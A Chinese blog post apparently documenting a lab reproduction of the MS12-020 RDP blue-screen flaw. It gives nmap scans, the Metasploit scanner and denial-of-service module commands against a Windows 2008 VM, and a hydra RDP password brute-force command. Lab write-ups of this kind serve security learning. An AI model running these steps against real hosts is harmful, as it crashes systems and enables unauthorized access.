ms12-020死亡蓝屏复现

配置环境

攻击方:kali

受害方:win2008(保持开机状态,不用登陆进去)

可能遇到的问题:

虚拟机打开时报错:如果该虚拟机未在使用,请按“获取所有权(T)”按钮获取它的所有权。否则,请按“取消(C)”按钮以防损坏。

解决方法:删除.vmx.lck文件。

问题产生的原因:上次虚拟机没有正常关闭,比如直接关掉主机啥的。

死亡蓝屏漏洞复现

  • nmap首先扫一下网段

    nmap -sP 192.168.56.0/24

    微信截图_20240807093212

    排除法:

    192.168.56.129是kali的ip,192.168.56.1、192.168.56.2是网关、192.168.56.254、

    所以目标靶机的ip是192.168.56.130.

    如何排除常见特殊ip地址

    微信截图_20240807093244

  • 扫端口(看有没有开启3389端口)

    3389端口:远程桌面协议

    微信截图_20240807093643

  • 打开msf,开始攻击

    msfconsole
    //死亡蓝屏的漏洞编号为ms12-020
    search ms12-020

    微信截图_20240807094126

    微信截图_20240807094445

    查找到后可以看到两个工具:

    0:扫描工具

    1:攻击工具

    //先启动scanner
    use 0
    //查看需要配置的参数
    show options

    微信截图_20240807094544

    set rhost 192.168.56.130
    //运行
    run

    微信截图_20240807095020

    可以看到“The target is vulnerable”,就说明存在漏洞

    use 1
    set rhost 192.168.56.130
    run

    微信截图_20240807095220

    微信截图_20240807095328

  • 攻击成功!

    返回看看自己的win2008,已近蓝屏(重启即可恢复)

    微信截图_20240807095344

爆破密码实验

最重要的是字典,为了实验方便,我们自建字典,手动放入真实的用户名密码

微信截图_20240807103119

hydra -L 字典地址 -P 字典地址 rdp://192.168.56.130//靶机ip

目标靶机的ip地址获取参考,上文

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值